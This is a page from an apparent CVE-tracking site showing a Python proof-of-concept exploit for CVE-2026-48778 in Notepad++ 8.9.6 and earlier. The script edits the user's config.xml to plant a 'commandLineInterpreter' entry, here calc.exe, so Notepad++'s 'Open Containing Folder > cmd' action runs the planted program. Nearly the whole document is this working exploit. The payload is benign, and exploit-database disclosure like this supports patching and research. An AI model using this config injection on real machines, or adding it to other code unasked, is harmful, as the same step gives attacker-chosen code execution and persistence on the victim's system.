5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-48778
README.md
Rendering markdown...
POC / cve-2026-48778.py PY
⬇ Raw GitHub ✕ Close 
# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution via config.xml (CVE-2026-48778)
# Exploit DB: https://www.exploit-db.com/exploits/52606
# Date: 2026-05-30
# Exploit Author: Kavin Jindal (Avyukt Security)
# Contact: https://www.linkedin.com/in/kavin-jindal/
# Vendor Homepage: https://notepad-plus-plus.org
# Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/
# Version: <= 8.9.6
# Tested on: Windows 10/11
# CVE: CVE-2026-48778
# Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9

import os, sys
print(r'''
  ______   ______  ___  ___  ___  ____     ____ ___ ___________ 
 / ___/ | / / __/ |_  |/ _ \|_  |/ __/____/ / /( _ )_  /_  ( _ )
/ /__ | |/ / _/  / __// // / __// _ \/___/_  _/ _  |/ / / / _  |
\___/ |___/___/ /____/\___/____/\___/     /_/ \___//_/ /_/\___/ 
                                                                

''')
print("=====================================================================")
print("[+] A PoC for CVE 2026-48778 discovered in Notepad++.")
print("[+] Affected versions <= 8.9.6")
print("[+] Built by Kavin Jindal")
print("[+] Github: https://github.com/kavin-jindal/CVE-2026-48778-PoC")
print("[+] ExploitDB: https://www.exploit-db.com/exploits/52606")
print("=====================================================================\n")


appdata = os.environ["APPDATA"]
if not appdata:
    print("[!] APPDATA environment variable not found, exiting..")
    sys.exit()


config_path = os.path.join(appdata, "Notepad++", "config.xml")
existing = os.path.exists(config_path)
if existing==True:
    print("[+] Found config.xml at ==>", config_path)
else:
    print("config.xml not found. Ensure Notepad++ is installed and has been launched atleast once.")

x = open(config_path, 'r')
s = x.readlines()

payload='<GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>\n'
injected=False

for num,i in enumerate(s, start=0):
    if '<GUIConfig name="commandLineInterpreter">' in i:
        print("\n[!] Injecting payload..")         
        s[num]=payload
        injected=True
        break
    elif "</GUIConfigs>" in i:
        print("\n[!] Injecting payload..")
        s.insert(num, payload)       
        injected=True
        break
if not injected:
    print("\n[!] Payload injection failed.")
    sys.exit(1)

y = open(config_path, 'w')
y.writelines(s)
print("\n[+] Payload injected successfully!")
print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd")
print("[+] Calc.exe will launch instead of cmd.")